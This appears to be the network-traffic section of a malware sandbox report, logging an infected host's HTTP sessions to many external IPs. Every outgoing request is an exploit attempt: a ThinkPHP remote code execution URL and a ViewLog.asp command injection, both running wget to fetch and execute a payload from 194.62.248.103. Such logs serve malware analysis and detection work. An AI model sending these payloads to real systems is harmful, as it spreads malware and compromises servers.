                                                        Apr 14, 2024 16:36:32.329710007 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.653449059 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.24.0
                                                        Date: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.235401695.217.164.17580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.329948902 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.655334949 CEST110INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain
                                                        Connection: close
                                                        Server: thin
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.233666831.200.123.908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.401654959 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.236067494.123.63.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.409790039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.235186495.57.65.11680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.642400980 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:33.032149076 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:36:33.032186031 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.235382095.57.54.19980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.642472982 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:33.035737991 CEST421INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Server: Apache
                                                        Content-Length: 207
                                                        Keep-Alive: timeout=15, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.234989831.129.125.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.755676985 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.235004885.18.227.108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:33.464042902 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:35.128690004 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:37.112147093 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.143548965 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:49.078458071 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:04.948277950 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:36.687839985 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.235058085.122.56.528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:33.472027063 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:33.808897972 CEST410INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 18:26:13 GMT
                                                        Server: web
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.234335694.121.186.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:33.479958057 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.2338746112.74.112.17480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:35.399159908 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:35.730870008 CEST161INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Date: Sun, 14 Apr 2024 14:36:35 GMT
                                                        Connection: close
                                                        Content-Length: 20
                                                        Data Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: <h1>Bad Request</h1>
                                                        Apr 14, 2024 16:36:38.712629080 CEST161INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Date: Sun, 14 Apr 2024 14:36:35 GMT
                                                        Connection: close
                                                        Content-Length: 20
                                                        Data Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: <h1>Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.2344384112.164.170.7080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:35.690443039 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.2340242112.147.130.7780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:35.690587997 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:35.982904911 CEST327INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 23:36:32 GMT
                                                        Server: Boa/0.94.14rc19
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.235863094.120.159.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.192368984 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:37.976110935 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:40.119889975 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.471112967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.917932987 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067612886 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.878777027 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.234366294.122.206.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:36.192436934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:37.976012945 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
